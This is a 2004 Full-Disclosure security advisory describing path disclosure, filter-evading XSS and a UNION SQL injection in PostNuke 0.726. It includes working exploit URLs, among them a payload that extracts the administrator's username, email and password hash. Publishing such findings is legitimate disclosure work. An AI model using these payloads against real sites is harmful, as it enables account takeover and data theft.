From come2waraxe@yahoo.com Sun Apr 18 18:46:42 2004
From: Janek Vind <come2waraxe@yahoo.com>
To: laserplaat@yahoo.com
Date: Sun, 18 Apr 2004 12:33:22 -0700 (PDT)
Subject: [Full-Disclosure] [waraxe-2004-SA#020 - Multiple vulnerabilities
    in PostNuke 0.726 Phoenix]



{================================================================================}
{                              [waraxe-2004-SA#020]   
                          }
{================================================================================}
{                                                     
                          }
{            [ Multiple vulnerabilities in PostNuke
0.726 Phoenix ]              }
{                                                     
                          }
{================================================================================}
                                                      
                                                      
                  
Author: Janek Vind "waraxe"
Date: 18. April 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=20


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

PostNuke: The Phoenix Release (0.7.2.6)

PostNuke is an open source, open developement content
management system
(CMS).  PostNuke started as a fork from PHPNuke
(http://www.phpnuke.org) and
provides many enhancements and improvements over the
PHP-Nuke system.  PostNuke
is still undergoing development but a large number of
core functions are now
stabilising and a complete API for third-party
developers is now in place.
If you would like to help develop this software,
please visit our homepage
at http://noc.postnuke.com/
You can also visit us on our IRC Server
irc.postnuke.com channel
	#postnuke-support
	#postnuke-chat
	#postnuke
Or at the Community Forums located at:
http://forums.postnuke.com/


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A. Full path disclosure:

A1 - legacy code

http://localhost/postnuke0726/admin.php?module=Past_Nuke&op=deleteNotice
Fatal error: Call to undefined function:
deletenotice() in
D:\apache_wwwroot\postnuke0726\admin.php on line 87

It seems, that this function - deletenotice() - is
removed in new versions, but reference still exists.
Btw, anyone without any authentication can provoke
this error, not only admins.



A2 - path disclosure through sql injection

http://localhost/postnuke0726/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=0&thold=p
Fatal error: Call to a member function on a non-object
in
D:\apache_wwwroot\postnuke0726\modules\NS-Polls\comments.php
on line 454

This is sql injection bug through variable named
"thold", but here we use it for path disclosure.




B. Cross-site scripting aka XSS:

Exploiting XSS in PostNuke is difficult task, because
PostNuke will filter out most of the "useful"
tags, like <script>. But anyway, there exists XSS bugs
and they can be exploited, using some
custom technics (therefore loosing crossbrowser
compatibility of the sploit).

B1 - XSS through unsanitaized variable "$order"

http://localhost/postnuke0726/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=ppp><s%00cript>alert(document.cookie);</s%00cript>ppp&thold=99
http://localhost/postnuke0726/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=ppp><body%20onload=alert(document.cookie);




C. Sql injection:

C1 - critical sql injection in NS-Polls

This is devastating case of the sql injection, because
it can be used to pull out from database
ANY data, attacker needs.

http://localhost/postnuke0726/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=0&thold=99999%20UNION%20SELECT%20null,null,null,null,pn_pass,pn_email,null,null,pn_uname,null,null,null%20FROM%20nuke_users%20WHERE%20pn_uid=2/*

... and we will see admin's username, email and
password's md5 hash in plaintext ;)

Remark - this sploit needs mysql version >=4.x with
UNION functionality enabled!




Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Greets to torufoorum members and to all bugtraq
readers in Estonia! Tervitused!
Special greets to UT Bee Clan members at
http://bees.tk ! "Boom!!" ;)



Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    come2waraxe@yahoo.com
    Janek Vind "waraxe"

    Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ]
------------------------------------



	
		
__________________________________
Do you Yahoo!?
Yahoo! Photos: High-quality 4x6 digital prints for 25¢
http://photos.yahoo.com/ph/print_splash

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html